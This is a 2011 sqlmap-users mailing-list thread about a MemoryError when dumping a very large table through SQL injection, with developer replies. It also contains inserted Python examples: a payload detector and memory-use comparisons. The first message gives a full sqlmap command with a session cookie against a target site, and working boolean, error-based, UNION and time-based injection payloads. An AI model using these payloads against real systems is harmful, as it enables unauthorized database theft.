Thread: [sqlmap-users] Memory problems
From: David G. <sk...@gm...> - 2011-01-27 19:40:54
# ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 -D nomes -T class --dump

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 16:58:05

[16:58:05] [DEBUG] cleaning up configuration parameters
[16:58:05] [DEBUG] setting the HTTP timeout
[16:58:05] [DEBUG] setting the HTTP Cookie header
[16:58:05] [DEBUG] setting the HTTP method to POST
[16:58:05] [DEBUG] creating HTTP requests opener object
[16:58:05] [INFO] using '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file
[16:58:05] [INFO] resuming injection data from session file
[16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:58:05] [INFO] testing connection to the target url
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: vulnparam
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: vulnparam=6 AND 5647=5647

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: UNION query
Title: MySQL UNION query (NULL) - 4 to 7 columns
Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: vulnparam=6 AND SLEEP(5)
---

[16:58:06] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.2
back-end DBMS: MySQL 5.0
[16:58:06] [INFO] fetching columns for table 'class' on database 'nomes'
[16:58:06] [INFO] read from file '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns
[16:58:06] [INFO] fetching entries for table 'class' on database 'nomes'
[16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM nomes.class#
[17:00:09] [DEBUG] performed 1 queries in 122 seconds

[17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev
Python version: 2.6.5
Operating system: posix
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in start
    action()
  File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action
    conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable())
  File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in dumpTable
    entries = inject.getValue(query, blind=False, dump=True)
  File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue
    value = __goInband(query, expected, sort, resumeValue, unpack, dump)
  File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
    data = parseUnionPage(output, expression, partial, None, sort)
  File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in parseUnionPage
    dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, logOutput))
MemoryError

[*] shutting down at: 17:00:13

There are about 50,350 entries in the table and 48 columns. I tested the query manually, and returned a page with 600k of information. I think that sqlmap did not support the amount of data...?

David
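An added example, not part of the original post and not sqlmap code: a log-side check that flags POST parameters matching the four payload families in the output above and decodes the `CHAR(58,...,58)` delimiters they embed, which can then be searched for in responses. The request bodies are constructed from the payloads quoted in this message; `inspect_body` and `decode_markers` are names chosen for this sketch.

```python
import re
from urllib.parse import parse_qsl, urlencode

# One pattern per technique named in the sqlmap output quoted in this thread.
SIGNATURES = (
    ("boolean-based blind",
     re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1(?!\d)", re.I)),
    ("error-based",
     re.compile(r"FLOOR\(\s*RAND\(\s*0\s*\)\s*\*\s*2\s*\).*?\bGROUP\s+BY\b", re.I | re.S)),
    ("UNION query",
     re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("time-based blind",
     re.compile(r"\b(?:AND|OR)\s+SLEEP\(\s*\d+\s*\)", re.I)),
)

# CHAR(n,n,...) calls; the payloads above wrap their output in CHAR(58,x,y,z,58).
CHAR_CALL = re.compile(r"\bCHAR\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)


def decode_markers(value):
    """Return the ':xyz:' delimiters a value builds with CHAR(58,...,58)."""
    markers = []
    for match in CHAR_CALL.finditer(value):
        codes = [int(code) for code in match.group(1).split(",")]
        if len(codes) >= 3 and codes[0] == codes[-1] == 58 and max(codes) < 128:
            markers.append("".join(chr(code) for code in codes))
    return markers


def inspect_body(body):
    """Inspect one URL-encoded POST body; return a finding per suspicious parameter."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        techniques = [label for label, pattern in SIGNATURES if pattern.search(value)]
        if techniques:
            findings.append({
                "param": name,
                "techniques": techniques,
                "markers": decode_markers(value),
            })
    return findings


# Constructed sample input: parameter values copied from the payloads in the post.
SAMPLE_VALUES = [
    "6",
    "6 AND 5647=5647",
    "6 AND (SELECT 714 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,106,112,58),"
    "(SELECT (CASE WHEN (714=714) THEN 1 ELSE 0 END)),CHAR(58,99,99,109,58),"
    "FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)",
    "6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,111,106,112,58),"
    "IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL#",
    "6 AND SLEEP(5)",
]
SAMPLE_BODIES = [urlencode({"vulnparam": value}) for value in SAMPLE_VALUES]
# Constructed benign body: the word AND alone must not trigger a finding.
BENIGN_BODY = "note=salt+AND+pepper&vulnparam=6"


if __name__ == "__main__":
    for body in SAMPLE_BODIES + [BENIGN_BODY]:
        print(body[:60], "->", inspect_body(body))
```

The decoded delimiters (for example `:ojp:` and `:ccm:`) are per-run random strings, so they are useful for correlating one session's requests and responses rather than as a fixed signature.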
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:48:48
LOL (50,350 entries in the table and 48 columns)

we'll try to make some tests regarding this and report accordingly.
haven't planned this kind of "huge" data retrievals :)

kr

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:55:30
http://mail.python.org/pipermail/mailman-users/2005-October/047436.html

"A MemoryError exception is a built-in Python exception "Raised when an
operation runs out of memory but the situation may still be rescued
(by deleting some objects)."

How many members does this list have? According to the FAQ, the largest
list reported to date has 147,000 members and presumably works.
Possibly something in the cPanel implementation or your particular
installation limits this to a greater degree."

now, this messes our concept a bit but we'll try to adapt.

kr

--
Miroslav Stampar
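The traceback earlier in the thread stops at a statement that formats the whole query output (`logOutput`) into one `[%s][%s][%s][%s][%s]` record, the kind of allocation the quoted MemoryError description refers to. As an added example (not sqlmap's code and not the change its developers made), this compares the peak memory of that pattern with writing the same record piece by piece; the row data, the URL and all function names are constructed for the illustration.

```python
import os
import shutil
import tempfile
import tracemalloc

# First four fields of the record format seen in the traceback.
RECORD_HEAD = "[%s][%s][%s][%s]["


def constructed_rows(n_rows, n_cols):
    """Yield constructed result rows one at a time (stand-in for a dumped table)."""
    for r in range(n_rows):
        yield "|".join("r%dc%d" % (r, c) for c in range(n_cols)) + ";"


def log_formatted(path, meta, n_rows, n_cols):
    """Pattern from the traceback: whole output as one string, then one formatted record."""
    log_output = "".join(constructed_rows(n_rows, n_cols))
    record = "[%s][%s][%s][%s][%s]\n" % (meta + (log_output,))  # second full copy
    with open(path, "w") as handle:
        handle.write(record)


def log_streamed(path, meta, n_rows, n_cols):
    """Same record written incrementally; only one row is held in memory at a time."""
    with open(path, "w") as handle:
        handle.write(RECORD_HEAD % meta)
        for row in constructed_rows(n_rows, n_cols):
            handle.write(row)
        handle.write("]\n")


def peak_bytes(writer, path, meta, n_rows, n_cols):
    """Run one writer under tracemalloc and return its peak traced allocation."""
    tracemalloc.start()
    try:
        writer(path, meta, n_rows, n_cols)
        return tracemalloc.get_traced_memory()[1]
    finally:
        tracemalloc.stop()


def compare(n_rows=2000, n_cols=48):
    """Return (formatted_peak, streamed_peak, files_identical) for the two writers."""
    # Constructed metadata: url, place, parameters, expression.
    meta = ("http://example.invalid/page", "POST", "param=1", "SELECT ...")
    workdir = tempfile.mkdtemp()
    try:
        formatted_path = os.path.join(workdir, "formatted.session")
        streamed_path = os.path.join(workdir, "streamed.session")
        formatted_peak = peak_bytes(log_formatted, formatted_path, meta, n_rows, n_cols)
        streamed_peak = peak_bytes(log_streamed, streamed_path, meta, n_rows, n_cols)
        with open(formatted_path) as first, open(streamed_path) as second:
            identical = first.read() == second.read()
        return formatted_peak, streamed_peak, identical
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    formatted_peak, streamed_peak, identical = compare()
    print("formatted peak: %d bytes" % formatted_peak)
    print("streamed peak:  %d bytes" % streamed_peak)
    print("identical files:", identical)
```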
From: Miroslav S. <mir...@gm...> - 2011-01-27 20:04:19
in the meantime you can try to use these:

--start=LIMITSTART  First query output entry to retrieve
--stop=LIMITSTOP    Last query output entry to retrieve

kr

--
Miroslav Stampar
From: David G. <sk...@gm...> - 2011-01-28 15:03:17
--start and --stop are not working

Sqlmap just ignores these parameters. I think when used with union injection technique, these parameters are ignored(??). tried with --start 1 and --stop 20.

--
David Gomes Guimarães
From: Miroslav S. <mir...@gm...> - 2011-01-28 15:12:55
yes, Bernardo warned me about this yesterday night :)

we'll try to find something

kr
>> >>> Finally, a world-class log management solution at an even better >> >>> price-free! >> >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >> >>> February 28th, so secure your free ArcSight Logger TODAY! >> >>> http://p.sf.net/sfu/arcsight-sfd2d >> >>> _______________________________________________ >> >>> sqlmap-users mailing list >> >>> sql...@li... >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >>> >> >>> >> >> >> >> >> >> >> >> -- >> >> Miroslav Stampar >> >> >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> >> Mobile: +385921010204 (HR 0921010204) >> >> PGP Key ID: 0xB5397B1B >> >> Location: Zagreb, Croatia >> >> >> > >> > >> > >> > -- >> > Miroslav Stampar >> > >> > E-mail / Jabber: miroslav.stampar (at) gmail.com >> > Mobile: +385921010204 (HR 0921010204) >> > PGP Key ID: 0xB5397B1B >> > Location: Zagreb, Croatia >> > >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia > > > > -- > David Gomes Guimarães > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Miroslav S. <mir...@gm...> - 2011-01-28 23:06:54
|
Hi David.

I've made a little testing and couldn't reproduce this one. 100,000 rows with 100 columns (integer numbers from 0-99) and still no crashing (30MB long session file). Also, I've tried to make a really large array, but still nothing. OS went unresponsive, but couldn't get "MemoryError".

Could you try to run it on some other system? Also, is there anything else interesting about this "large" data retrieval?

KR

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia |
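The traceback in the original report ends on the line that formats the whole query output into a single string before it is written to the session file. The following is an added illustration, not sqlmap's code and not part of any message in this thread: it measures how the peak allocation of that pattern grows with the record size while a row-by-row write stays flat. The function names, the session key and the rows are constructed for the example, and it assumes Python 3 (for `tracemalloc`) rather than the Python 2.6.5 of the report.

```python
import hashlib
import tracemalloc

COLUMNS = 48   # column count quoted in the report
ROWS = 5000    # constructed: scaled down from the reported 50,350 to keep the demo quick


def constructed_rows():
    """Yield constructed rows one at a time, standing in for parsed query output."""
    for i in range(ROWS):
        yield ["r%dc%d" % (i, c) for c in range(COLUMNS)]


class HashingSink(object):
    """File-like sink that keeps only a byte count and a SHA-256 of what was written."""

    def __init__(self):
        self.size = 0
        self._sha = hashlib.sha256()

    def write(self, text):
        data = text.encode("utf-8")
        self.size += len(data)
        self._sha.update(data)

    def hexdigest(self):
        return self._sha.hexdigest()


def write_all_at_once(out, key):
    """Same shape as the failing call: format the entire output into one string, then write."""
    log_output = "".join("|".join(row) + "\n" for row in constructed_rows())
    out.write("[%s][%s]\n" % (key, log_output))


def write_streaming(out, key):
    """Produce the identical record, but hand it to the sink one row at a time."""
    out.write("[%s][" % key)
    for row in constructed_rows():
        out.write("|".join(row) + "\n")
    out.write("]\n")


def measure(writer):
    """Return (bytes written, sha256 of the record, peak traced allocation in bytes)."""
    sink = HashingSink()
    tracemalloc.start()
    try:
        writer(sink, "constructed-session-key")
        _, peak = tracemalloc.get_traced_memory()
    finally:
        tracemalloc.stop()
    return sink.size, sink.hexdigest(), peak


if __name__ == "__main__":
    for writer in (write_all_at_once, write_streaming):
        size, digest, peak = measure(writer)
        print("%-18s record=%d bytes  peak=%d bytes  sha256=%s..."
              % (writer.__name__, size, peak, digest[:12]))
```

Both writers emit byte-identical records; only the all-at-once variant needs memory proportional to the record, which is why its failure depends on the host's available memory as much as on the table size.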
From: Bernardo D. A. G. <ber...@gm...> - 2011-02-02 09:47:05
|
Now the UNION query technique also takes --start and --stop into account, like the other techniques.

Bernardo

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |
From: David G. <sk...@gm...> - 2011-02-02 11:12:02
|
Thank u bernardo. =)

--
David Gomes Guimarães |